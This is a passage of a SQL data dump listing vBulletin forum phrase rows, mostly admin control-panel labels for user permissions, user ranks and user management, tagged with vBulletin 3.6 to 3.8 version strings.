200px.', 'vbulletin', 'vBulletin Solutions', 1216910617, '3.8.0 Alpha 1'), (33642, -1, 'social_group_permissions', 'cppermission', 'Social Groups Permissions', 'vbulletin', 'vBulletin Solutions', 1192546547, '3.7.0 Beta 1'), (33643, -1, 'space_in_bytes_attachlimit', 'cppermission', 'Space (in bytes) that a user\'s total attachment usage may consume (Set to 0 to not have a limit)', 'vbulletin', '', 0, ''), (33644, -1, 'use_custom_permissions', 'cppermission', 'Use Custom Permissions', 'vbulletin', '', 0, ''), (33645, -1, 'use_default_permissions', 'cppermission', 'Use Usergroup Default Permissions (Note: this will delete any previous custom permissions set)', 'vbulletin', '', 0, ''), (33646, -1, 'user_album_permissions', 'cppermission', 'User Album Permissions', 'vbulletin', 'vBulletin Solutions', 1191938585, '3.7.0 Beta 1'), (33647, -1, 'user_infraction_banning_level', 'cppermission', 'User Infraction Banning Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33648, -1, 'user_infraction_permissions', 'cppermission', 'User Infraction Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33649, -1, 'user_note_permissions', 'cppermission', 'User Note Permissions', 'vbulletin', '', 0, ''), (33650, -1, 'user_permissions', 'cppermission', 'User Permissions', 'vbulletin', '', 0, ''), (33651, -1, 'user_reputation_permissions', 'cppermission', 'User Reputation Permissions', 'vbulletin', '', 0, ''), (33652, -1, 'usercss_permissions', 'cppermission', 'Profile Customization Permissions', 'vbulletin', 'vBulletin Solutions', 1218464274, '3.8.0 Alpha 1'), (33653, -1, 'usergroup_based_permission_duplicator', 'cppermission', 'User Group-Based Permission Duplicator', 'vbulletin', '', 0, ''), (33654, -1, 'usergroup_user_title', 'cppermission', 'User Title (Use this to override the default \'ladder\' of user titles)', 'vbulletin', '', 0, ''), (33655, -1, 'username_markup', 'cppermission', 'Username HTML Markup (Specify an opening and closing HTML tag with which to display the names of users in this group. This applies to names that appear on Logged-in Users, Who\'s Online, Users Browsing Forum, Users Browsing Thread, Posts, Member List etc.)', 'vbulletin', '', 0, ''), (33656, -1, 'view_control_panel_log', 'cppermission', 'View Control Panel Log', 'vbulletin', '', 0, ''), (33657, -1, 'view_forum_permissions', 'cppermission', 'View Forum Permissions', 'vbulletin', '', 0, ''), (33658, -1, 'view_permissions', 'cppermission', 'View Permissions', 'vbulletin', '', 0, ''), (33659, -1, 'viewable_on_memberlist', 'cppermission', 'Viewable on the Memberlist (Sets whether or not users in this group will appear on the member list)', 'vbulletin', '', 0, ''), (33660, -1, 'viewable_on_showgroups', 'cppermission', 'Viewable on Show Groups (Sets whether or not to show members of this group on the \'View Forum Leaders\' page)', 'vbulletin', '', 0, ''), (33661, -1, 'visitor_message_permissions', 'cppermission', 'Visitor Message Permissions', 'vbulletin', 'vBulletin Solutions', 1197370859, '3.7.0 Beta 1'), (33662, -1, 'whos_online_permissions', 'cppermission', 'Who\'s Online Permissions', 'vbulletin', '', 0, ''), (33663, -1, 'x_access_masks_set', 'cppermission', '{1} Access Mask(s) set', 'vbulletin', '', 0, ''), (33664, -1, 'x_is_already_a_member_of_the_usergroup_y', 'cppermission', '{1} is already a member of the usergroup {2}.', 'vbulletin', '', 0, ''), (33665, -1, 'always', 'cprank', 'Always', 'vbulletin', '', 0, ''), (33666, -1, 'are_you_sure_you_want_to_delete_this_user_rank', 'cprank', 'Are you sure you want to delete this User Rank?', 'vbulletin', '', 0, ''), (33667, -1, 'display_type', 'cprank', 'Display Type', 'vbulletin', '', 0, ''), (33668, -1, 'displaygroup', 'cprank', 'Displaygroup', 'vbulletin', '', 0, ''), (33669, -1, 'if_displaygroup_equals_this_group', 'cprank', 'If Displaygroup = This Group', 'vbulletin', '', 0, ''), (33670, -1, 'images', 'cprank', 'Images', 'vbulletin', '', 0, ''), (33671, -1, 'or_you_may_enter_text', 'cprank', 'OR you may enter textHTML is allowed', 'vbulletin', '', 0, ''), (33672, -1, 'rank_type', 'cprank', 'Rank Type', 'vbulletin', '', 0, ''), (33673, -1, 'stack_rank', 'cprank', 'Stack Rank', 'vbulletin', '', 0, ''), (33674, -1, 'times_to_repeat_rank', 'cprank', 'Number of times to repeat rank:', 'vbulletin', '', 0, ''), (33675, -1, 'user_rank_file_path', 'cprank', 'User Rank File Path', 'vbulletin', '', 0, ''), (33676, -1, 'user_rank_manager', 'cprank', 'User Rank Manager', 'vbulletin', '', 0, ''), (33677, -1, 'accept_all', 'cpuser', 'Accept All', 'vbulletin', '', 0, ''), (33678, -1, 'add_new_answer', 'cpuser', 'Add New Answer', 'vbulletin', 'vBulletin Solutions', 1192567934, '3.7.0 Beta 1'), (33679, -1, 'add_new_custom_avatar', 'cpuser', 'Add New Custom Avatar', 'vbulletin', '', 0, ''), (33680, -1, 'add_new_question', 'cpuser', 'Add New Question', 'vbulletin', 'vBulletin Solutions', 1192568552, '3.7.0 Beta 1'), (33681, -1, 'add_new_user_infraction_level', 'cpuser', 'Add New User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33682, -1, 'add_new_user_title', 'cpuser', 'Add New User Title', 'vbulletin', '', 0, ''), (33683, -1, 'add_paid_subscription', 'cpuser', 'Add Paid Subscription', 'vbulletin', 'vBulletin Solutions', 1146076320, '3.6.0 Beta 1'), (33684, -1, 'additional_users', 'cpuser', 'Additional Users', 'vbulletin', '', 0, ''), (33685, -1, 'admin_override_options', 'cpuser', 'Admin Override Options', 'vbulletin', 'vBulletin Solutions', 1144591102, '3.6.0 Beta 1'), (33686, -1, 'admin_set_html_allowed', 'cpuser', 'Yes, admin set (HTML allowed)', 'vbulletin', '', 0, ''), (33687, -1, 'all_members_of_this_usergroup_will_revert', 'cpuser', 'All members of this usergroup will revert to the {1} group.', 'vbulletin', 'vBulletin Solutions', 1219837239, '3.8.0 Alpha 1'), (33688, -1, 'all_posts_will_be_set_to_guest', 'cpuser', 'All posts made by this user will be set to \'Guest\'', 'vbulletin', '', 0, ''), (33689, -1, 'all_time', 'cpuser', 'All Time', 'vbulletin', '', 0, ''), (33690, -1, 'allow_access_to_forum', 'cpuser', 'Allow Access to Forum', 'vbulletin', '', 0, ''), (33691, -1, 'answer', 'cpuser', 'Answer', 'vbulletin', 'vBulletin Solutions', 1192567959, '3.7.0 Beta 1'), (33692, -1, 'answers', 'cpuser', 'Answers', 'vbulletin', 'vBulletin Solutions', 1192568654, '3.7.0 Beta 1'), (33693, -1, 'are_you_sure_want_to_delete_private_messages_belonging_to_the_user_x', 'cpuser', 'Are you sure you want to delete the private messages belonging to the user called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33694, -1, 'are_you_sure_want_to_delete_private_messages_sent_by_the_user_x', 'cpuser', 'Are you sure you want to delete the private messages sent by the user called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33695, -1, 'are_you_sure_want_to_delete_subscriptions_x', 'cpuser', 'Are you sure you want to delete the subscriptions called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33696, -1, 'are_you_sure_want_to_delete_user_x', 'cpuser', 'Are you sure you want to delete the user called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33697, -1, 'are_you_sure_want_to_delete_visitor_messages_sent_by_the_user_x', 'cpuser', 'Are you sure you want to delete the visitor messages sent by the user called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1222174623, '3.8.0 Alpha 2'), (33698, -1, 'are_you_sure_you_want_to_delete_this_answer', 'cpuser', 'Are you sure you want to delete this answer?', 'vbulletin', 'vBulletin Solutions', 1192563305, '3.7.0 Beta 1'), (33699, -1, 'are_you_sure_you_want_to_delete_this_question', 'cpuser', 'Are you sure you want to delete this question?', 'vbulletin', 'vBulletin Solutions', 1192563340, '3.7.0 Beta 1'), (33700, -1, 'are_you_sure_you_want_to_delete_this_user_title', 'cpuser', 'Are you sure you want to delete this User Title?', 'vbulletin', '', 0, ''), (33701, -1, 'are_you_sure_you_want_to_merge_x_into_y', 'cpuser', 'Are you sure you want to merge {1} into {2}?
\r\n
\r\n{1} will be deleted after the merge.', 'vbulletin', '', 0, ''), (33702, -1, 'auto_subscription_mode', 'cpuser', 'Automatic Thread Subscription Mode', 'vbulletin', '', 0, ''), (33703, -1, 'avatars_to_show_per_page', 'cpuser', 'Avatars to Show Per Page', 'vbulletin', '', 0, ''), (33704, -1, 'ban_user', 'cpuser', 'Ban User', 'vbulletin', '', 0, ''), (33705, -1, 'birthday_is_after', 'cpuser', 'Birthday is After', 'vbulletin', '', 0, ''), (33706, -1, 'birthday_is_before', 'cpuser', 'Birthday is Before', 'vbulletin', '', 0, ''), (33707, -1, 'browsing_options', 'cpuser', 'Browsing Options', 'vbulletin', '', 0, ''), (33708, -1, 'change_avatar', 'cpuser', 'Change Avatar', 'vbulletin', '', 0, ''), (33709, -1, 'change_profile_picture', 'cpuser', 'Change Profile Picture', 'vbulletin', '', 0, ''), (33710, -1, 'change_signature', 'cpuser', 'Change Signature', 'vbulletin', '', 0, ''), (33711, -1, 'change_signature_picture', 'cpuser', 'Change Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33712, -1, 'click_the_button_to_send_password_reminder_to_x', 'cpuser', 'Click the button below to send a password reminder to {1}', 'vbulletin', '', 0, ''), (33713, -1, 'confirm_merge', 'cpuser', 'Confirm Merge', 'vbulletin', '', 0, ''), (33714, -1, 'coppa_user', 'cpuser', 'COPPA User', 'vbulletin', '', 0, ''), (33715, -1, 'could_not_resolve_hostname', 'cpuser', 'Could Not Resolve Hostname', 'vbulletin', '', 0, ''), (33716, -1, 'current_reputation_power', 'cpuser', 'Current Reputation Power', 'vbulletin', '', 0, ''), (33717, -1, 'delete_all', 'cpuser', 'Delete All', 'vbulletin', '', 0, ''), (33718, -1, 'delete_all_users_private_messages', 'cpuser', 'Delete All User\'s Private Messages', 'vbulletin', '', 0, ''), (33719, -1, 'delete_avatar', 'cpuser', 'Delete Avatar', 'vbulletin', '', 0, ''), (33720, -1, 'delete_private_messages', 'cpuser', 'Delete Private Messages', 'vbulletin', '', 0, ''), (33721, -1, 'delete_private_messages_sent_by_user', 'cpuser', 'Delete Private Messages Sent by User', 'vbulletin', '', 0, ''), (33722, -1, 'delete_subscriptions', 'cpuser', 'Delete Subscriptions', 'vbulletin', '', 0, ''), (33723, -1, 'delete_user', 'cpuser', 'Delete User', 'vbulletin', '', 0, ''), (33724, -1, 'delete_user_transfer_social_groups', 'cpuser', 'This user is the maintainer of {1} social group(s)
\r\nIf you delete this user, you will also delete their social groups as well as all discussions, messages, user memberships, social group images and all other content related to their social groups.

\r\nIf you want to force the transfer of this user\'s social groups to yourself so that you may transfer or manage them later then check this checkbox: ', 'vbulletin', 'vBulletin Solutions', 1227018721, '3.8.0 Beta 3'), (33725, -1, 'delete_visitor_messages_sent_by_user', 'cpuser', 'Delete Visitor Messages Sent by User', 'vbulletin', 'vBulletin Solutions', 1222174645, '3.8.0 Alpha 2'), (33726, -1, 'deleting_bans', 'cpuser', 'Deleting Bans', 'vbulletin', '', 0, ''), (33727, -1, 'deleting_custom_avatars', 'cpuser', 'Deleting Custom Avatars', 'vbulletin', '', 0, ''), (33728, -1, 'deleting_custom_profilepics', 'cpuser', 'Deleting Custom Profile Pictures', 'vbulletin', '', 0, ''), (33729, -1, 'deleting_event_reminders', 'cpuser', 'Deleting Event Reminders', 'vbulletin', '', 0, ''), (33730, -1, 'deleting_events', 'cpuser', 'Deleting Events', 'vbulletin', '', 0, ''), (33731, -1, 'deleting_moderators', 'cpuser', 'Deleting Moderators', 'vbulletin', '', 0, ''), (33732, -1, 'deleting_private_messages', 'cpuser', 'Deleting Private Messages', 'vbulletin', '', 0, ''), (33733, -1, 'deleting_subscriptions', 'cpuser', 'Deleting Subscriptions', 'vbulletin', '', 0, ''), (33734, -1, 'deleting_user_forum_access', 'cpuser', 'Deleting User Forum Access', 'vbulletin', '', 0, ''), (33735, -1, 'deleting_usergroup_join_requests', 'cpuser', 'Deleting Usergroup Join Requests', 'vbulletin', '', 0, ''), (33736, -1, 'deleting_usernotes', 'cpuser', 'Deleting User Notes', 'vbulletin', '', 0, ''), (33737, -1, 'deleting_users', 'cpuser', 'Deleting Users', 'vbulletin', '', 0, ''), (33738, -1, 'depth_to_search', 'cpuser', 'Depth to Search', 'vbulletin', '', 0, ''), (33739, -1, 'destination_username', 'cpuser', 'Destination Username', 'vbulletin', '', 0, ''), (33740, -1, 'display_aim_screen_name', 'cpuser', 'Display AIM Screen Name', 'vbulletin', '', 0, ''), (33741, -1, 'display_avatars', 'cpuser', 'Display Avatars', 'vbulletin', '', 0, ''), (33742, -1, 'display_birthday', 'cpuser', 'Display Birthday', 'vbulletin', '', 0, ''), (33743, -1, 'display_coppa_user', 'cpuser', 'Display COPPA User', 'vbulletin', '', 0, ''), (33744, -1, 'display_email', 'cpuser', 'Display Email', 'vbulletin', '', 0, ''), (33745, -1, 'display_group', 'cpuser', 'Display Group', 'vbulletin', 'vBulletin Solutions', 1153865337, '3.6.0 Release Candidate 3'), (33746, -1, 'display_home_page', 'cpuser', 'Display Home Page', 'vbulletin', '', 0, ''), (33747, -1, 'display_icq_uin', 'cpuser', 'Display ICQ UIN', 'vbulletin', '', 0, ''), (33748, -1, 'display_images', 'cpuser', 'Display Images', 'vbulletin', '', 0, ''), (33749, -1, 'display_infraction_points', 'cpuser', 'Display Infraction Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33750, -1, 'display_infractions', 'cpuser', 'Display Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33751, -1, 'display_ip_address', 'cpuser', 'Display IP Address', 'vbulletin', '', 0, ''), (33752, -1, 'display_join_date', 'cpuser', 'Display Join Date', 'vbulletin', '', 0, ''), (33753, -1, 'display_last_activity', 'cpuser', 'Display Last Activity', 'vbulletin', '', 0, ''), (33754, -1, 'display_last_post', 'cpuser', 'Display Last Post', 'vbulletin', '', 0, ''), (33755, -1, 'display_msn_id', 'cpuser', 'Display MSN ID', 'vbulletin', '', 0, ''), (33756, -1, 'display_parent_email_address', 'cpuser', 'Display Parent Email Address', 'vbulletin', '', 0, ''), (33757, -1, 'display_post_count', 'cpuser', 'Display Post Count', 'vbulletin', '', 0, ''), (33758, -1, 'display_reputation', 'cpuser', 'Display Reputation', 'vbulletin', '', 0, ''), (33759, -1, 'display_signature', 'cpuser', 'Display Signature', 'vbulletin', '', 0, ''), (33760, -1, 'display_signatures', 'cpuser', 'Display Signatures', 'vbulletin', '', 0, ''), (33761, -1, 'display_skype_name', 'cpuser', 'Display Skype Name', 'vbulletin', '', 0, ''), (33762, -1, 'display_user_title', 'cpuser', 'Display User Title', 'vbulletin', '', 0, ''), (33763, -1, 'display_usergroup', 'cpuser', 'Display Usergroup', 'vbulletin', '', 0, ''), (33764, -1, 'display_username', 'cpuser', 'Display User Name', 'vbulletin', '', 0, ''), (33765, -1, 'display_warnings', 'cpuser', 'Display Warnings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33766, -1, 'display_x', 'cpuser', 'Display {1}', 'vbulletin', '', 0, ''), (33767, -1, 'display_yahoo_id', 'cpuser', 'Display Yahoo! ID', 'vbulletin', '', 0, ''), (33768, -1, 'do_not_show_editor_toolbar', 'cpuser', 'Do Not Show Editor Toolbar', 'vbulletin', '', 0, ''), (33769, -1, 'dst_currently_in_effect', 'cpuser', 'Is DST currently in effect', 'vbulletin', '', 0, ''), (33770, -1, 'edit_access_masks', 'cpuser', 'Edit Access Masks', 'vbulletin', '', 0, ''), (33771, -1, 'edit_administrator_permissions', 'cpuser', 'Edit Administrator Permissions', 'vbulletin', '', 0, ''), (33772, -1, 'edit_forum_permissions_access_masks', 'cpuser', 'Edit Forum Permissions (Access Masks)', 'vbulletin', '', 0, ''), (33773, -1, 'edit_profile_customizations', 'cpuser', 'Edit Profile Customizations', 'vbulletin', 'vBulletin Solutions', 1199377150, '3.7.0 Beta 4'), (33774, -1, 'edit_profile_style_customizations_for_x', 'cpuser', 'Edit Profile Style Customizations for \'{1}\'', 'vbulletin', 'vBulletin Solutions', 1199377034, '3.7.0 Beta 4'), (33775, -1, 'edit_reputation', 'cpuser', 'Edit Reputation', 'vbulletin', '', 0, ''), (33776, -1, 'edit_reputation_comment', 'cpuser', 'Edit Reputation Comment', 'vbulletin', '', 0, ''), (33777, -1, 'edit_user', 'cpuser', 'Edit User', 'vbulletin', '', 0, ''), (33778, -1, 'email_manager', 'cpuser', 'Email Manager', 'vbulletin', '', 0, ''), (33779, -1, 'email_options', 'cpuser', 'Email Options', 'vbulletin', '', 0, ''), (33780, -1, 'email_password_reminder_to_user', 'cpuser', 'Email Password Reminder to User', 'vbulletin', '', 0, ''), (33781, -1, 'email_to_send_at_once', 'cpuser', 'Email to send at once:', 'vbulletin', '', 0, ''), (33782, -1, 'email_will_be_sent_in_user_specified_language', 'cpuser', 'Note: The email will be sent in the language selected by the user in their profile.', 'vbulletin', '', 0, ''), (33783, -1, 'enter_image_url', 'cpuser', 'Please enter the URL of your image:', 'vbulletin', 'vBulletin Solutions', 1150468466, '3.6.0 Beta 3'), (33784, -1, 'enter_signature_picture_url', 'cpuser', 'Enter Signature Picture URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33785, -1, 'expires', 'cpuser', 'Expires', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33786, -1, 'find_ip_addresses_for_user', 'cpuser', 'Find IP Addresses for userEnter Username', 'vbulletin', '', 0, ''), (33787, -1, 'find_more_users_with_this_ip_address', 'cpuser', 'Find More Users with this IP Address', 'vbulletin', '', 0, ''), (33788, -1, 'find_users_by_ip_address', 'cpuser', 'Find Users by IP AddressYou may enter a partial IP Address', 'vbulletin', '', 0, ''), (33789, -1, 'forum_permissions', 'cpuser', 'Forum Permissions', 'vbulletin', '', 0, ''), (33790, -1, 'has_not_logged_on_for_xx_days', 'cpuser', 'Has not logged on for x days', 'vbulletin', '', 0, ''), (33791, -1, 'human_verification_manager', 'cpuser', 'Human Verification Manager', 'vbulletin', 'vBulletin Solutions', 1192567987, '3.7.0 Beta 1'), (33792, -1, 'human_verification_options', 'cpuser', 'Human Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568009, '3.7.0 Beta 1'), (33793, -1, 'icq_uin', 'cpuser', 'ICQ UIN', 'vbulletin', '', 0, ''), (33794, -1, 'if_you_leave_a_field_blank_it_will_be_ignored', 'cpuser', 'If you leave a field blank it will be ignored', 'vbulletin', '', 0, ''), (33795, -1, 'if_you_want_to_prune_user_posts_first', 'cpuser', 'If you want to prune all the user\'s messages first, please click here.', 'vbulletin', '', 0, ''), (33796, -1, 'ignore_all', 'cpuser', 'Ignore All', 'vbulletin', '', 0, ''), (33797, -1, 'image_options', 'cpuser', 'Image Options', 'vbulletin', '', 0, ''), (33798, -1, 'image_verification_options', 'cpuser', 'Image Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568061, '3.7.0 Beta 1'), (33799, -1, 'include_users_that_have_declined_email', 'cpuser', 'Include users that have declined admin emails?', 'vbulletin', '', 0, ''), (33800, -1, 'infraction_groups', 'cpuser', 'Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33801, -1, 'infraction_points', 'cpuser', 'Infraction Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33802, -1, 'infraction_points_are_greater_than', 'cpuser', 'Infraction Points are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33803, -1, 'infraction_points_are_less_than', 'cpuser', 'Infraction Points are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33804, -1, 'infractions_are_greater_than', 'cpuser', 'Infractions are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33805, -1, 'infractions_are_less_than', 'cpuser', 'Infractions are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33806, -1, 'ip_address_search_for_ip_address_x', 'cpuser', 'IP Address Search for IP Address: \"
{1}\"', 'vbulletin', '', 0, ''), (33807, -1, 'ip_address_search_for_user_x', 'cpuser', 'IP Address Search for User: \"{1}\"', 'vbulletin', '', 0, ''), (33808, -1, 'it_is_recommended_that_you_update_user_titles', 'cpuser', 'It is recommended that you update user titles and ranks after adding, editing, and deleting user titles or ranks.', 'vbulletin', '', 0, ''), (33809, -1, 'join_date_is_after', 'cpuser', 'Join Date is After', 'vbulletin', '', 0, ''), (33810, -1, 'join_date_is_before', 'cpuser', 'Join Date is Before', 'vbulletin', '', 0, ''), (33811, -1, 'join_requests_manager', 'cpuser', 'Join Requests Manager', 'vbulletin', '', 0, ''), (33812, -1, 'keep_adminavatar', 'cpuser', 'Keep Custom Avatar', 'vbulletin', 'vBulletin Solutions', 1144591065, '3.6.0 Beta 1'), (33813, -1, 'keep_adminprofilepic', 'cpuser', 'Keep Custom Profile Pic', 'vbulletin', 'vBulletin Solutions', 1144591077, '3.6.0 Beta 1'), (33814, -1, 'last_activity_is_after', 'cpuser', 'Last Activity is After', 'vbulletin', '', 0, ''), (33815, -1, 'last_activity_is_before', 'cpuser', 'Last Activity is Before', 'vbulletin', '', 0, ''), (33816, -1, 'last_post_is_after', 'cpuser', 'Last Post is After', 'vbulletin', '', 0, ''), (33817, -1, 'last_post_is_before', 'cpuser', 'Last Post is Before', 'vbulletin', '', 0, ''), (33818, -1, 'list_new_registrations', 'cpuser', 'List New Registrations', 'vbulletin', '', 0, ''), (33819, -1, 'list_top_posters', 'cpuser', 'List Top Posters', 'vbulletin', '', 0, ''), (33820, -1, 'list_users_awaiting_moderation', 'cpuser', 'List Users Awaiting Moderation', 'vbulletin', '', 0, ''), (33821, -1, 'list_users_with_x_messages', 'cpuser', 'List Users with {1} Messages', 'vbulletin', '', 0, ''), (33822, -1, 'list_visitors_in_the_last_24_hours', 'cpuser', 'List Visitors in the Last 24 Hours', 'vbulletin', '', 0, ''), (33823, -1, 'maximum_results', 'cpuser', 'Max Results', 'vbulletin', '', 0, ''), (33824, -1, 'merge_allows_you_to_join_two_user_accounts', 'cpuser', 'Merge allows you to join two user accounts into one single account.\r\nThe source account will be combined into the destination account.
\r\n
\r\nPosts, threads, calendar events, private messages, post count, reputation, contacts, friends and ignore list will be combined.
\r\n
\r\nThe combined user will still have the same permissions that the destination user had to begin with.\r\nAny access masks or moderator ability that the source user had will not be transferred.
\r\n
\r\nThis process cannot be reversed.', 'vbulletin', 'vBulletin Solutions', 1196771209, '3.7.0 Beta 1'), (33825, -1, 'merge_users', 'cpuser', 'Merge Users', 'vbulletin', '', 0, ''), (33826, -1, 'message_email', 'cpuser', 'Message:In the message, you may use $userid, $username, $email, $activateid, and $activatelink.

$activateid will be the activation number the user must use to activate his/her account. $activatelink will be the URL that a user needs to visit to be activated. Note: These will only be defined to users in the \"Users Awaiting Email Confirmation\" group.

Note: you cannot send passwords using this form as they are encrypted in the database. Please link to the \'lost password\' form instead.
', 'vbulletin', '', 0, ''), (33827, -1, 'move_user_to_usergroup', 'cpuser', 'Move User to Usergroup', 'vbulletin', '', 0, ''), (33828, -1, 'msn_id', 'cpuser', 'MSN ID', 'vbulletin', '', 0, ''), (33829, -1, 'new_value', 'cpuser', 'New Value', 'vbulletin', 'vBulletin Solutions', 1190802674, '3.7.0 Beta 1'), (33830, -1, 'no_matches_found', 'cpuser', 'No Matches Found', 'vbulletin', '', 0, ''), (33831, -1, 'number_of_messages', 'cpuser', 'Number of Messages', 'vbulletin', '', 0, ''), (33832, -1, 'number_of_users', 'cpuser', 'Number of Users', 'vbulletin', '', 0, ''), (33833, -1, 'old_value', 'cpuser', 'Old Value', 'vbulletin', 'vBulletin Solutions', 1190802664, '3.7.0 Beta 1'), (33834, -1, 'other_please_specify', 'cpuser', 'Other (please specify)', 'vbulletin', '', 0, ''), (33835, -1, 'personal_home_page', 'cpuser', 'Home Page', 'vbulletin', '', 0, ''), (33836, -1, 'please_input_referral_dates', 'cpuser', 'Please input the dates that you would like the report run for or leave them blank for a report covering everything.', 'vbulletin', '', 0, ''), (33837, -1, 'points', 'cpuser', 'Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33838, -1, 'pop_up_notification_box_when_a_private_message_is_received', 'cpuser', 'Pop up a Notification Box When a Private Message is Received', 'vbulletin', '', 0, ''), (33839, -1, 'post_ip_addresses', 'cpuser', 'Post IP Addresses', 'vbulletin', '', 0, ''), (33840, -1, 'posts_are_greater_than', 'cpuser', 'Posts are greater than or equal to', 'vbulletin', '', 0, ''), (33841, -1, 'posts_are_less_than', 'cpuser', 'Posts are less than', 'vbulletin', '', 0, ''), (33842, -1, 'posts_is_less_than', 'cpuser', 'Posts is less than', 'vbulletin', '', 0, ''), (33843, -1, 'primary_users', 'cpuser', 'Primary Users', 'vbulletin', '', 0, ''), (33844, -1, 'private_message_statistics', 'cpuser', 'Private Message Statistics', 'vbulletin', '', 0, ''), (33845, -1, 'private_messages_belonging_to_the_user', 'cpuser', 'Private Messages belonging to the user', 'vbulletin', '', 0, ''), (33846, -1, 'private_messages_for_x', 'cpuser', 'Private Messages for {1}', 'vbulletin', '', 0, ''), (33847, -1, 'private_messages_sent_by_the_user', 'cpuser', 'Private Messages sent by the user', 'vbulletin', '', 0, ''), (33848, -1, 'process', 'cpuser', 'Process', 'vbulletin', '', 0, ''), (33849, -1, 'profile_style_customizations', 'cpuser', 'Profile Style Customizations', 'vbulletin', 'vBulletin Solutions', 1199377123, '3.7.0 Beta 4'), (33850, -1, 'question_dfn', 'cpuser', 'QuestionAnswers are added after the question is created.', 'vbulletin', 'vBulletin Solutions', 1192568807, '3.7.0 Beta 1'), (33851, -1, 'question_verification_options', 'cpuser', 'Question & Answer Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568615, '3.7.0 Beta 1'), (33852, -1, 'quick_user_links', 'cpuser', 'Quick User Links', 'vbulletin', '', 0, ''), (33853, -1, 'receieve_friend_request_notification', 'cpuser', 'Receive Friend Request Notification', 'vbulletin', 'vBulletin Solutions', 1195308646, '3.7.0 Beta 1'), (33854, -1, 'referrals_for_x', 'cpuser', 'Referrals for {1}', 'vbulletin', '', 0, ''), (33855, -1, 'regex', 'cpuser', 'Regex', 'vbulletin', 'vBulletin Solutions', 1192568890, '3.7.0 Beta 1'), (33856, -1, 'registration_ip_address', 'cpuser', 'Registration IP Address', 'vbulletin', '', 0, ''), (33857, -1, 'registration_ip_addresses', 'cpuser', 'Registration IP Addresses', 'vbulletin', '', 0, ''), (33858, -1, 'regular_expression_require_match', 'cpuser', 'Regular ExpressionYou may require the input field to match a regular expression (PCRE).', 'vbulletin', 'vBulletin Solutions', 1192568760, '3.7.0 Beta 1'), (33859, -1, 'reputation_for_a_page_b_c_there_are_d_comments', 'cpuser', 'Reputation for {1} (Page {2}/{3}) | There are {4} comments.', 'vbulletin', '', 0, ''), (33860, -1, 'reputation_is_greater_than', 'cpuser', 'Reputation is greater than or equal to', 'vbulletin', '', 0, ''), (33861, -1, 'reputation_is_less_than', 'cpuser', 'Reputation is less than', 'vbulletin', '', 0, ''), (33862, -1, 'resize_image_to_users_maximum_allowed_size', 'cpuser', 'Resize image to user\'s maximum allowed dimensions\r\nAs defined by their usergroup(s)', 'vbulletin', 'vBulletin Solutions', 1233582417, '3.8.2'), (33863, -1, 'resolve_address', 'cpuser', 'Resolve Address', 'vbulletin', '', 0, ''), (33864, -1, 'search_criteria', 'cpuser', 'Search Criteria', 'vbulletin', '', 0, ''), (33865, -1, 'search_ip_addresses', 'cpuser', 'Search IP Addresses', 'vbulletin', '', 0, ''), (33866, -1, 'search_users', 'cpuser', 'Search Users', 'vbulletin', '', 0, ''), (33867, -1, 'send_email_to_accepted_users', 'cpuser', 'Send email to users who have been accepted', 'vbulletin', '', 0, ''), (33868, -1, 'send_email_to_deleted_users', 'cpuser', 'Send email to users who have been deleted', 'vbulletin', '', 0, ''), (33869, -1, 'send_email_to_user', 'cpuser', 'Send Email to User', 'vbulletin', '', 0, ''), (33870, -1, 'send_password_to_user', 'cpuser', 'Send Password to User', 'vbulletin', '', 0, ''), (33871, -1, 'send_private_message_to_user', 'cpuser', 'Send Private Message to User', 'vbulletin', '', 0, ''), (33872, -1, 'show_all_coppa_users', 'cpuser', 'Show All COPPA Users', 'vbulletin', '', 0, ''), (33873, -1, 'show_all_users', 'cpuser', 'Show All Users', 'vbulletin', '', 0, ''), (33874, -1, 'show_others_custom_profile_styles', 'cpuser', 'Show Other Users\' Custom Profile Styles', 'vbulletin', 'vBulletin Solutions', 1195659127, '3.7.0 Beta 1'), (33875, -1, 'showing_avatars_x_to_y_of_z', 'cpuser', 'Showing Avatars {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925346, '3.7.0 Release Candidate 1'), (33876, -1, 'showing_users_x_to_y_of_z', 'cpuser', 'Showing Users {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925375, '3.7.0 Release Candidate 1'), (33877, -1, 'sorting_options', 'cpuser', 'Sorting Options', 'vbulletin', '', 0, ''), (33878, -1, 'source_username', 'cpuser', 'Source Username', 'vbulletin', '', 0, ''), (33879, -1, 'starting_at_result', 'cpuser', 'Starting at 